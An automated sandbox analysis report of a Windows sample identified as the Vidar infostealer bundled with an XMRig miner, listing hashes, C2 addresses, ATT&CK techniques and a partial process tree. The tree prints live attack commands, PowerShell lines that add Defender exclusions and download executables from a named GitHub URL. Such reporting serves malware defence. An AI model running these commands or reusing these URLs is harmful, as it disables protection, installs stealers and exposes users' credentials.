vidar | 39b8d89f49c86b2a1f876763e3b4666749c85de715aa10aa96a00d5a2d83861a

Resubmissions

21/04/2025, 09:34

250421-ljrrga1rt5 10

21/04/2025, 09:28

250421-lffj2aytdt 7

Analysis

max time kernel
98s
max time network
132s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
21/04/2025, 09:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S0FTWARE.exe
Size

349KB
MD5

656a1813b1f6b1b23f86868148f03c97
SHA1

171427be31c7cd18d2838e9c985240a77370c99c
SHA256

98a355651f9f043e1ed3eaf1ac5ef8ff617f3438969e6488ef05ada40bac12d2
SHA512

69444b0a88c3a46da193a4920546a371b9243cb8a925ae725dc33e964f2342fe554e6e7f163f5d7eb6eb2b57e8d40d26e7fb2ff0ebf6b086402b20b69d21b2a7
SSDEEP

6144:ZdCuJHaXn51HBOWGEI8ue6/W4yJIyhBzOTVa:ZwuJqnbBjGEIn/W4yOk1

Score

10^/10

vidar xmrig fe765de57643ac9d227ea7737a97bb87 credential_access defense_evasion discovery execution miner persistence spyware stealer upx

Malware Config

Extracted

Family

vidar

Version

13.5

Botnet

fe765de57643ac9d227ea7737a97bb87

https://t.me/v00rd

https://steamcommunity.com/profiles/76561199846773220

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral4/files/0x001c00000002b1e7-32.dat	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral4/memory/5212-600-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-605-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-607-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-603-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-606-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-604-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-601-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-627-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5212-628-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
2	4404	powershell.exe
3	4404	powershell.exe
6	4856	powershell.exe
7	4856	powershell.exe
10	4884	powershell.exe
12	4884	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3520	powershell.exe
4852	powershell.exe
4164	powershell.exe
4404	powershell.exe
4856	powershell.exe
4884	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Updater.exe
File created	C:\Windows\system32\drivers\etc\hosts	mmytxipqox.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5568	chrome.exe
2932	chrome.exe
5936	chrome.exe
6052	chrome.exe
5540	msedge.exe
4476	msedge.exe
4316	msedge.exe
3348	chrome.exe

Executes dropped EXE 5 IoCs

pid	Process
2568	jazwjftd.exe
4860	plakgnuelnr.exe
6128	mmytxipqox.exe
4656	Updater.exe
1720	service.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
7	raw.githubusercontent.com
12	raw.githubusercontent.com
89	pastebin.com
137	pastebin.com
1	raw.githubusercontent.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5832	powercfg.exe
2056	powercfg.exe
1156	powercfg.exe
4836	powercfg.exe
1064	powercfg.exe
548	powercfg.exe
5224	powercfg.exe
1376	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	mmytxipqox.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4656 set thread context of 4828	4656	Updater.exe	167
PID 4656 set thread context of 5212	4656	Updater.exe	168

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/memory/5212-600-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-605-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-607-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-603-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-606-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-604-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-601-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-599-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-598-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-596-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-597-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-595-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-627-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5212-628-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4524	sc.exe
4612	sc.exe
2764	sc.exe
4744	sc.exe
2584	sc.exe
5992	sc.exe
2016	sc.exe
4796	sc.exe
1956	sc.exe
2108	sc.exe
4800	sc.exe
5220	sc.exe
4908	sc.exe
4124	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jazwjftd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	plakgnuelnr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	jazwjftd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	jazwjftd.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1520	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133897018027104693"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4616	schtasks.exe
2412	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4164	powershell.exe
4164	powershell.exe
4404	powershell.exe
4404	powershell.exe
4856	powershell.exe
4856	powershell.exe
4884	powershell.exe
4884	powershell.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
3348	chrome.exe
3348	chrome.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
6128	mmytxipqox.exe
3520	powershell.exe
3520	powershell.exe
3520	powershell.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
6128	mmytxipqox.exe
4656	Updater.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
4852	powershell.exe
4852	powershell.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
4656	Updater.exe
5212	explorer.exe
5212	explorer.exe
5212	explorer.exe
5212	explorer.exe
2568	jazwjftd.exe
2568	jazwjftd.exe
5212	explorer.exe
5212	explorer.exe
5212	explorer.exe
5212	explorer.exe
5212	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
5540	msedge.exe
5540	msedge.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeShutdownPrivilege	3348	chrome.exe
Token: SeCreatePagefilePrivilege	3348	chrome.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	1156	powercfg.exe
Token: SeCreatePagefilePrivilege	1156	powercfg.exe
Token: SeShutdownPrivilege	4836	powercfg.exe
Token: SeCreatePagefilePrivilege	4836	powercfg.exe
Token: SeShutdownPrivilege	1064	powercfg.exe
Token: SeCreatePagefilePrivilege	1064	powercfg.exe
Token: SeShutdownPrivilege	548	powercfg.exe
Token: SeCreatePagefilePrivilege	548	powercfg.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeLockMemoryPrivilege	5212	explorer.exe
Token: SeShutdownPrivilege	1376	powercfg.exe
Token: SeCreatePagefilePrivilege	1376	powercfg.exe
Token: SeShutdownPrivilege	5224	powercfg.exe
Token: SeCreatePagefilePrivilege	5224	powercfg.exe
Token: SeShutdownPrivilege	2056	powercfg.exe
Token: SeCreatePagefilePrivilege	2056	powercfg.exe
Token: SeShutdownPrivilege	5832	powercfg.exe
Token: SeCreatePagefilePrivilege	5832	powercfg.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
3348	chrome.exe
5540	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 5600	3672	S0FTWARE.exe	79
PID 3672 wrote to memory of 5600	3672	S0FTWARE.exe	79
PID 5600 wrote to memory of 4164	5600	cmd.exe	80
PID 5600 wrote to memory of 4164	5600	cmd.exe	80
PID 3672 wrote to memory of 3624	3672	S0FTWARE.exe	81
PID 3672 wrote to memory of 3624	3672	S0FTWARE.exe	81
PID 3624 wrote to memory of 4404	3624	cmd.exe	82
PID 3624 wrote to memory of 4404	3624	cmd.exe	82
PID 3672 wrote to memory of 4660	3672	S0FTWARE.exe	83
PID 3672 wrote to memory of 4660	3672	S0FTWARE.exe	83
PID 4660 wrote to memory of 4856	4660	cmd.exe	84
PID 4660 wrote to memory of 4856	4660	cmd.exe	84
PID 3672 wrote to memory of 2568	3672	S0FTWARE.exe	85
PID 3672 wrote to memory of 2568	3672	S0FTWARE.exe	85
PID 3672 wrote to memory of 2568	3672	S0FTWARE.exe	85
PID 3672 wrote to memory of 4908	3672	S0FTWARE.exe	86
PID 3672 wrote to memory of 4908	3672	S0FTWARE.exe	86
PID 3672 wrote to memory of 4860	3672	S0FTWARE.exe	87
PID 3672 wrote to memory of 4860	3672	S0FTWARE.exe	87
PID 3672 wrote to memory of 4860	3672	S0FTWARE.exe	87
PID 4908 wrote to memory of 4884	4908	cmd.exe	88
PID 4908 wrote to memory of 4884	4908	cmd.exe	88
PID 4860 wrote to memory of 6104	4860	plakgnuelnr.exe	89
PID 4860 wrote to memory of 6104	4860	plakgnuelnr.exe	89
PID 4860 wrote to memory of 6104	4860	plakgnuelnr.exe	89
PID 6104 wrote to memory of 4616	6104	cmd.exe	91
PID 6104 wrote to memory of 4616	6104	cmd.exe	91
PID 6104 wrote to memory of 4616	6104	cmd.exe	91
PID 2568 wrote to memory of 3348	2568	jazwjftd.exe	92
PID 2568 wrote to memory of 3348	2568	jazwjftd.exe	92
PID 3348 wrote to memory of 4168	3348	chrome.exe	93
PID 3348 wrote to memory of 4168	3348	chrome.exe	93
PID 3348 wrote to memory of 5488	3348	chrome.exe	94
PID 3348 wrote to memory of 5488	3348	chrome.exe	94
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95
PID 3348 wrote to memory of 1476	3348	chrome.exe	95

C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe
"C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dtlquoc', 'C:\Users', 'C:\ProgramData'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dtlquoc', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\dtlquoc\jazwjftd.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\dtlquoc\jazwjftd.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\dtlquoc\plakgnuelnr.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\dtlquoc\plakgnuelnr.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- C:\Users\Admin\AppData\Local\dtlquoc\jazwjftd.exe
  "C:\Users\Admin\AppData\Local\dtlquoc\jazwjftd.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ff98b59dcf8,0x7ff98b59dd04,0x7ff98b59dd10
      4⤵
      PID:4168
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1428,i,1158250117390491367,673843848831850021,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2080 /prefetch:11
      4⤵
      PID:5488
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
